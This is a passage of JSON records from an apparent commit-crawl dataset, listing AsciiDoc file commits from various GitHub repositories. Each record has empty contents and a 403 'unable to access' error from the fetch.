2016-07-22-prova.adoc","repos":"lerzegov\/lerzegov.github.io,lerzegov\/lerzegov.github.io,lerzegov\/lerzegov.github.io,lerzegov\/lerzegov.github.io","old_file":"_posts\/2016-07-22-prova.adoc","new_file":"_posts\/2016-07-22-prova.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lerzegov\/lerzegov.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4adb31b2264f51d419060b13ae48acad605341c0","subject":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","message":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","repos":"patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io","old_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","new_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/patricekrakow\/patricekrakow.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c262b72dffad20a86e0fbe1ea3102fae1de28c9d","subject":"Update 2016-11-29-Gabe-loses-his-Compasses-for-a-bit.adoc","message":"Update 2016-11-29-Gabe-loses-his-Compasses-for-a-bit.adoc","repos":"gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io","old_file":"_posts\/2016-11-29-Gabe-loses-his-Compasses-for-a-bit.adoc","new_file":"_posts\/2016-11-29-Gabe-loses-his-Compasses-for-a-bit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gjagush\/gjagush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"494511c37f7430edcb62a25a9287cb7d27ad1984","subject":"Added symbolic link of index.adoc","message":"Added symbolic link of index.adoc\n","repos":"spring-cloud\/spring-cloud-bus,spring-cloud\/spring-cloud-bus","old_file":"docs\/src\/main\/asciidoc\/index.adoc","new_file":"docs\/src\/main\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud\/spring-cloud-bus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"27a22605f7740bfff1b9cd43bc4b6f79baef5f8d","subject":"Update 2017-04-27-Meetup-Paris-Type-Script-9-Ionic.adoc","message":"Update 2017-04-27-Meetup-Paris-Type-Script-9-Ionic.adoc","repos":"Vtek\/vtek.github.io,Vtek\/vtek.github.io,Vtek\/vtek.github.io,Vtek\/vtek.github.io","old_file":"_posts\/2017-04-27-Meetup-Paris-Type-Script-9-Ionic.adoc","new_file":"_posts\/2017-04-27-Meetup-Paris-Type-Script-9-Ionic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vtek\/vtek.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0a454481e8768fc3edd2d561a690ff7216107230","subject":"Update 2018-04-30-Pengalaman-Beli-dan-Rental-Film-di-i-Tunes.adoc","message":"Update 2018-04-30-Pengalaman-Beli-dan-Rental-Film-di-i-Tunes.adoc","repos":"lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io","old_file":"_posts\/2018-04-30-Pengalaman-Beli-dan-Rental-Film-di-i-Tunes.adoc","new_file":"_posts\/2018-04-30-Pengalaman-Beli-dan-Rental-Film-di-i-Tunes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lovian\/lovian.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b5bd79d28b54346c81ea6fd57c45c09adad75847","subject":"new release post","message":"new release post\n","repos":"clojure\/clojurescript-site","old_file":"content\/news\/2017-08-16-release.adoc","new_file":"content\/news\/2017-08-16-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojurescript-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"f16e0b1682b9ede751f1c80d42e26d5abfdba902","subject":"Update 2016-02-10-Bae.adoc","message":"Update 2016-02-10-Bae.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2016-02-10-Bae.adoc","new_file":"_posts\/2016-02-10-Bae.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fced0c245bcbffaffcd4f66b3bb224f214a4dc70","subject":"re blog post documentation","message":"re blog post documentation\n","repos":"juhuntenburg\/gsoc2017,juhuntenburg\/gsoc2017,juhuntenburg\/gsoc2017,juhuntenburg\/gsoc2017","old_file":"_posts\/2017-08-11-Documentation.adoc","new_file":"_posts\/2017-08-11-Documentation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/juhuntenburg\/gsoc2017.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b5d72a7abf4067f49f04ab4eccb306ef00f5a983","subject":"Update 2016-04-04-Desde-afuera.adoc","message":"Update 2016-04-04-Desde-afuera.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Desde-afuera.adoc","new_file":"_posts\/2016-04-04-Desde-afuera.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"985c288f21306237a810a27d35c41cf7158e68b5","subject":"Add release notes document for release 2.22.3","message":"Add release notes document for release 2.22.3\n\nSigned-off-by: Gregor Zurowski <5fdc67d2166bcdd1d3aa4ed45ea5a25e9b21bc20@zurowski.org>\n","repos":"Fabryprog\/camel,zregvart\/camel,davidkarlsen\/camel,pax95\/camel,nikhilvibhav\/camel,gnodet\/camel,tadayosi\/camel,tdiesler\/camel,ullgren\/camel,christophd\/camel,CodeSmell\/camel,davidkarlsen\/camel,objectiser\/camel,mcollovati\/camel,nicolaferraro\/camel,cunningt\/camel,apache\/camel,gnodet\/camel,tadayosi\/camel,tdiesler\/camel,DariusX\/camel,cunningt\/camel,christophd\/camel,DariusX\/camel,alvinkwekel\/camel,gnodet\/camel,nikhilvibhav\/camel,mcollovati\/camel,zregvart\/camel,ullgren\/camel,christophd\/camel,zregvart\/camel,cunningt\/camel,CodeSmell\/camel,adessaigne\/camel,zregvart\/camel,nicolaferraro\/camel,nikhilvibhav\/camel,pmoerenhout\/camel,objectiser\/camel,pmoerenhout\/camel,objectiser\/camel,pax95\/camel,pax95\/camel,pax95\/camel,adessaigne\/camel,Fabryprog\/camel,CodeSmell\/camel,Fabryprog\/camel,pax95\/camel,tadayosi\/camel,apache\/camel,pmoerenhout\/camel,punkhorn\/camel-upstream,apache\/camel,adessaigne\/camel,alvinkwekel\/camel,punkhorn\/camel-upstream,christophd\/camel,tdiesler\/camel,adessaigne\/camel,davidkarlsen\/camel,Fabryprog\/camel,ullgren\/camel,apache\/camel,pmoerenhout\/camel,apache\/camel,tadayosi\/camel,punkhorn\/camel-upstream,pmoerenhout\/camel,pmoerenhout\/camel,punkhorn\/camel-upstream,nicolaferraro\/camel,DariusX\/camel,nicolaferraro\/camel,DariusX\/camel,gnodet\/camel,tdiesler\/camel,christophd\/camel,christophd\/camel,mcollovati\/camel,davidkarlsen\/camel,adessaigne\/camel,ullgren\/camel,alvinkwekel\/camel,gnodet\/camel,alvinkwekel\/camel,nikhilvibhav\/camel,pax95\/camel,cunningt\/camel,tadayosi\/camel,cunningt\/camel,cunningt\/camel,tadayosi\/camel,CodeSmell\/camel,adessaigne\/camel,mcollovati\/camel,tdiesler\/camel,tdiesler\/camel,objectiser\/camel,apache\/camel","old_file":"docs\/user-manual\/en\/release-notes\/camel-2223-release.adoc","new_file":"docs\/user-manual\/en\/release-notes\/camel-2223-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"de747e50341f1142174cb621b6d7199286b730df","subject":"Add README","message":"Add README\n","repos":"myfear\/arquillian-example-cube-helloworld,aslakknutsen\/arquillian-example-cube-helloworld","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aslakknutsen\/arquillian-example-cube-helloworld.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5af92cd0e39a65bb74d6f1a15be2576797dad248","subject":"README file","message":"README file\n","repos":"mobile-geo\/leaflet-plugins,dtruel\/leaflet-plugins,Polyconseil\/leaflet-plugins,gam6itko\/leaflet-plugins,Skrupellos\/leaflet-plugins,socialpinpoint\/leaflet-plugins,opie\/leaflet-plugins,cschell\/leaflet-plugins,rouleur\/leaflet-plugins,azavea\/leaflet-plugins,dtruel\/leaflet-plugins,jblarsen\/leaflet-plugins,shramov\/leaflet-plugins,falcacibar\/leaflet-plugins,Polyconseil\/leaflet-plugins,jblarsen\/leaflet-plugins,azavea\/leaflet-plugins,savelevcorr\/leaflet-plugins,falcacibar\/leaflet-plugins,MasterHK\/leaflet-plugins,gam6itko\/leaflet-plugins,savelevcorr\/leaflet-plugins,nmlemus\/leaflet-plugins,gavioto\/leaflet-plugins,socialpinpoint\/leaflet-plugins,cschell\/leaflet-plugins,cschell\/leaflet-plugins,gavioto\/leaflet-plugins,falcacibar\/leaflet-plugins,rouleur\/leaflet-plugins,realtymaps\/leaflet-plugins,azavea\/leaflet-plugins,Skrupellos\/leaflet-plugins,mobile-geo\/leaflet-plugins,opie\/leaflet-plugins,realtymaps\/leaflet-plugins,nmlemus\/leaflet-plugins,dtruel\/leaflet-plugins,MasterHK\/leaflet-plugins,shramov\/leaflet-plugins","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/falcacibar\/leaflet-plugins.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"39bc8c2bfbf4894f2fd411d1db62d31f3788d001","subject":"Update Readme","message":"Update Readme\n","repos":"sferik\/Nim,JCavallo\/Nim,nimLuckyBull\/Nim,tulayang\/Nim,xland\/Nim,judofyr\/Nim,BlaXpirit\/nre,zachaysan\/Nim,Senketsu\/Nim,jsanjuas\/Nim,zachaysan\/Nim,haiodo\/Nim,xland\/Nim,msmith491\/Nim,jsanjuas\/Nim,jfhg\/Nim,Dhertz\/Nim,reactormonk\/nim,fredericksilva\/Nim,nimLuckyBull\/Nim,Salafit\/Nim,fredericksilva\/Nim,Salafit\/Nim,xland\/Nim,JCavallo\/Nim,fredericksilva\/Nim,msmith491\/Nim,reactormonk\/nim,JCavallo\/Nim,nafsaka\/Nim,nimLuckyBull\/Nim,singularperturbation\/Nim,endragor\/Nim,jfhg\/Nim,singularperturbation\/Nim,xland\/Nim,judofyr\/Nim,Senketsu\/Nim,bvssvni\/Nim,reactormonk\/nim,bvssvni\/Nim,reactormonk\/nim,singularperturbation\/Nim,tmm1\/Nim,Dhertz\/Nim,fmamud\/Nim,dom96\/Nim,jfhg\/Nim,judofyr\/Nim,Salafit\/Nim,zachaysan\/Nim,dom96\/Nim,sarvex\/Nim-lang,Matt14916\/Nim,reactormonk\/nim,nanoant\/Nim,jsanjuas\/Nim,sarvex\/Nim-lang,douglas-larocca\/Nim,xland\/Nim,fmamud\/Nim,msmith491\/Nim,xland\/Nim,nafsaka\/Nim,Dhertz\/Nim,msmith491\/Nim,Salafit\/Nim,endragor\/Nim,jfhg\/Nim,tulayang\/Nim,Dhertz\/Nim,russpowers\/Nim,Matt14916\/Nim,mbaulch\/Nim,Senketsu\/Nim,nanoant\/Nim,Senketsu\/Nim,tmm1\/Nim,fredericksilva\/Nim,bvssvni\/Nim,Senketsu\/Nim,msmith491\/Nim,singularperturbation\/Nim,Senketsu\/Nim,tmm1\/Nim,nanoant\/Nim,judofyr\/Nim,reactormonk\/nim,mbaulch\/Nim,haiodo\/Nim,nimLuckyBull\/Nim,bvssvni\/Nim,fredericksilva\/Nim,jsanjuas\/Nim,douglas-larocca\/Nim,jsanjuas\/Nim,jfhg\/Nim,jsanjuas\/Nim,sferik\/Nim,mbaulch\/Nim,fmamud\/Nim,Matt14916\/Nim,sferik\/Nim,douglas-larocca\/Nim,dom96\/Nim,bvssvni\/Nim,Dhertz\/Nim,greyanubis\/Nim,zachaysan\/Nim,Matt14916\/Nim,Dhertz\/Nim,msmith491\/Nim,douglas-larocca\/Nim,endragor\/Nim,tmm1\/Nim,judofyr\/Nim,haiodo\/Nim,nafsaka\/Nim,Dhertz\/Nim,tmm1\/Nim,greyanubis\/Nim,russpowers\/Nim,nimLuckyBull\/Nim,nanoant\/Nim,russpowers\/Nim,nanoant\/Nim,Senketsu\/Nim,fmamud\/Nim,sarvex\/Nim-lang,fmamud\/Nim,msmith491\/Nim,nafsaka\/Nim,nanoant\/Nim,mbaulch\/Nim,fredericksilva\/Nim,russpowers\/Nim,douglas-larocca\/Nim,Matt14916\/Nim,sarvex\/Nim-lang,douglas-larocca\/Nim,haiodo\/Nim,russpowers\/Nim,haiodo\/Nim,JCavallo\/Nim,sarvex\/Nim-lang,jfhg\/Nim,singularperturbation\/Nim,bvssvni\/Nim,endragor\/Nim,nafsaka\/Nim,Salafit\/Nim,singularperturbation\/Nim,reactormonk\/nim,judofyr\/Nim,greyanubis\/Nim,russpowers\/Nim,nafsaka\/Nim,JCavallo\/Nim,Matt14916\/Nim,tulayang\/Nim,mbaulch\/Nim,judofyr\/Nim,fredericksilva\/Nim,sferik\/Nim,dom96\/Nim,jfhg\/Nim,sferik\/Nim,sarvex\/Nim-lang,bvssvni\/Nim,tulayang\/Nim,tulayang\/Nim,greyanubis\/Nim,sarvex\/Nim-lang,xland\/Nim,JCavallo\/Nim,nafsaka\/Nim,Salafit\/Nim,douglas-larocca\/Nim,fmamud\/Nim,russpowers\/Nim,judofyr\/Nim,dom96\/Nim,Matt14916\/Nim,zachaysan\/Nim,zachaysan\/Nim,endragor\/Nim,reactormonk\/nim,sferik\/Nim,endragor\/Nim,nanoant\/Nim,douglas-larocca\/Nim,greyanubis\/Nim,mbaulch\/Nim,BlaXpirit\/nre,tmm1\/Nim,sferik\/Nim,dom96\/Nim,fredericksilva\/Nim,zachaysan\/Nim,tulayang\/Nim,JCavallo\/Nim,flaviut\/nre,dom96\/Nim,endragor\/Nim,singularperturbation\/Nim,greyanubis\/Nim,fmamud\/Nim,tmm1\/Nim,nimLuckyBull\/Nim,sferik\/Nim,jsanjuas\/Nim,mbaulch\/Nim,Salafit\/Nim,haiodo\/Nim,haiodo\/Nim,nimLuckyBull\/Nim,greyanubis\/Nim","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tulayang\/Nim.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f7f3059c72327c55f90dc479685556a1fc4e9bdb","subject":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","message":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","repos":"patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io","old_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/patricekrakow\/patricekrakow.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4ea22eb57b7cedd7914d2b7e2f64d5c0b90802ac","subject":"Update 2016-12-22-Larastudy.adoc","message":"Update 2016-12-22-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-22-Larastudy.adoc","new_file":"_posts\/2016-12-22-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e00ddd1676945e57b09aea9cfa6b8d59e3269813","subject":"Update 2016-03-06-Purple-MagicBands-now-a-choice-in-MyMagic.adoc","message":"Update 2016-03-06-Purple-MagicBands-now-a-choice-in-MyMagic.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-03-06-Purple-MagicBands-now-a-choice-in-MyMagic.adoc","new_file":"_posts\/2016-03-06-Purple-MagicBands-now-a-choice-in-MyMagic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf4856f88854b19a044001ecdf29ef9c33ec4234","subject":"y2b create post 5 Reasons Earphones Are Better Than Headphones","message":"y2b create post 5 Reasons Earphones Are Better Than Headphones","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-04-29-5-Reasons-Earphones-Are-Better-Than-Headphones.adoc","new_file":"_posts\/2016-04-29-5-Reasons-Earphones-Are-Better-Than-Headphones.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7009326b6dc59176ee45c091b525fc171fe16b84","subject":"Renamed '_posts\/2020-04-25-This-week-i-joined-Makerlog.adoc' to '_posts\/2020-04-25-4-days-ago-i-joined-a-community-of-Makers.adoc'","message":"Renamed '_posts\/2020-04-25-This-week-i-joined-Makerlog.adoc' to '_posts\/2020-04-25-4-days-ago-i-joined-a-community-of-Makers.adoc'","repos":"anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog","old_file":"_posts\/2020-04-25-4-days-ago-i-joined-a-community-of-Makers.adoc","new_file":"_posts\/2020-04-25-4-days-ago-i-joined-a-community-of-Makers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/personal-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d57f4ac6f600b584284328009b070b70967497a9","subject":"Update 2017-09-19-making-a-custom-theme-for-hubpress.adoc","message":"Update 2017-09-19-making-a-custom-theme-for-hubpress.adoc","repos":"brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io","old_file":"_posts\/2017-09-19-making-a-custom-theme-for-hubpress.adoc","new_file":"_posts\/2017-09-19-making-a-custom-theme-for-hubpress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/brendena\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c40a85064bafb0b36aa2052495ee4095af604dcd","subject":"Update 2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","message":"Update 2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","new_file":"_posts\/2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9d40b5dc4ebd06db5683337496b52475c4e7f380","subject":"Added symbolic link of index.adoc","message":"Added symbolic link of index.adoc\n","repos":"ryanjbaxter\/spring-cloud-netflix,sfat\/spring-cloud-netflix,sfat\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,sfat\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,sfat\/spring-cloud-netflix,spring-cloud\/spring-cloud-netflix,sfat\/spring-cloud-netflix,spring-cloud\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix","old_file":"docs\/src\/main\/asciidoc\/index.adoc","new_file":"docs\/src\/main\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ryanjbaxter\/spring-cloud-netflix.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"68bdd207c0605ff4c794d4f19a246ed56e8b54c8","subject":"Update 2017-01-18-Pancake-C-M-S-Improvements-Week-2.adoc","message":"Update 2017-01-18-Pancake-C-M-S-Improvements-Week-2.adoc","repos":"prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io","old_file":"_posts\/2017-01-18-Pancake-C-M-S-Improvements-Week-2.adoc","new_file":"_posts\/2017-01-18-Pancake-C-M-S-Improvements-Week-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateekjadhwani\/prateekjadhwani.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a24678871961793e8ab1ff41720938516056cb8d","subject":"y2b create post World's Coolest Taxi (E3 2014)","message":"y2b create post World's Coolest Taxi (E3 2014)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-06-11-Worlds-Coolest-Taxi-E3-2014.adoc","new_file":"_posts\/2014-06-11-Worlds-Coolest-Taxi-E3-2014.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1591ff7bca31397a4583c3bf2ae4849b3c8db1a5","subject":"Update 2015-11-24-Borg-Deduplicating-Archiver.adoc","message":"Update 2015-11-24-Borg-Deduplicating-Archiver.adoc","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2015-11-24-Borg-Deduplicating-Archiver.adoc","new_file":"_posts\/2015-11-24-Borg-Deduplicating-Archiver.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b6c72987b70e647649ac2008e2f45a7faf2d222d","subject":"y2b create post An Unexpected Gift From YouTube","message":"y2b create post An Unexpected Gift From YouTube","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-04-19-An-Unexpected-Gift-From-YouTube.adoc","new_file":"_posts\/2016-04-19-An-Unexpected-Gift-From-YouTube.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"78871ffcb14b175a0a827d50cc15a80c855e7fe3","subject":"Update 2016-04-01-A-quien-le-interese-Semana-1.adoc","message":"Update 2016-04-01-A-quien-le-interese-Semana-1.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-01-A-quien-le-interese-Semana-1.adoc","new_file":"_posts\/2016-04-01-A-quien-le-interese-Semana-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"343c158d22f6548f0612c0ffc6daf8d45bd571ca","subject":"y2b create post They Call It The PowerHouse...","message":"y2b create post They Call It The PowerHouse...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-09-04-They-Call-It-The-PowerHouse.adoc","new_file":"_posts\/2016-09-04-They-Call-It-The-PowerHouse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c7c4eae9258081d89a77e74f42839095c629571c","subject":"Update 2017-10-08-Enable-E-S-Node-using-Babel.adoc","message":"Update 2017-10-08-Enable-E-S-Node-using-Babel.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-10-08-Enable-E-S-Node-using-Babel.adoc","new_file":"_posts\/2017-10-08-Enable-E-S-Node-using-Babel.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"876640cfef6cc0f13737b2538a2e857bc8d5b5b8","subject":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","message":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1de10a6bd3522e248aa3f479c5bbbb0ba55998ff","subject":"Update 2015-11-01-Enlaces-Utiles-Deploy.adoc","message":"Update 2015-11-01-Enlaces-Utiles-Deploy.adoc","repos":"jelitox\/jelitox.github.io,jelitox\/jelitox.github.io,jelitox\/jelitox.github.io","old_file":"_posts\/2015-11-01-Enlaces-Utiles-Deploy.adoc","new_file":"_posts\/2015-11-01-Enlaces-Utiles-Deploy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jelitox\/jelitox.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1e4cf5afcc7f630246f63dfff17488f7728fab0c","subject":"Update 2016-6-26-PHPER-H5-base64-base64.adoc","message":"Update 2016-6-26-PHPER-H5-base64-base64.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-26-PHPER-H5-base64-base64.adoc","new_file":"_posts\/2016-6-26-PHPER-H5-base64-base64.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4915cca94321fdcacf1d214c0b65a9e4b6ff2130","subject":"Update 2014-11-11-On-LET-a-brief-comparative-thesis.adoc","message":"Update 2014-11-11-On-LET-a-brief-comparative-thesis.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2014-11-11-On-LET-a-brief-comparative-thesis.adoc","new_file":"_posts\/2014-11-11-On-LET-a-brief-comparative-thesis.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5905ad5a98b496679a1e28f748cf8fd33fbb0e2f","subject":"add doc about contributing to the project","message":"add doc about contributing to the project\n","repos":"spring-projects\/sts4,spring-projects\/sts4,spring-projects\/sts4,spring-projects\/sts4,spring-projects\/sts4,spring-projects\/sts4","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-projects\/sts4.git\/': The requested URL returned 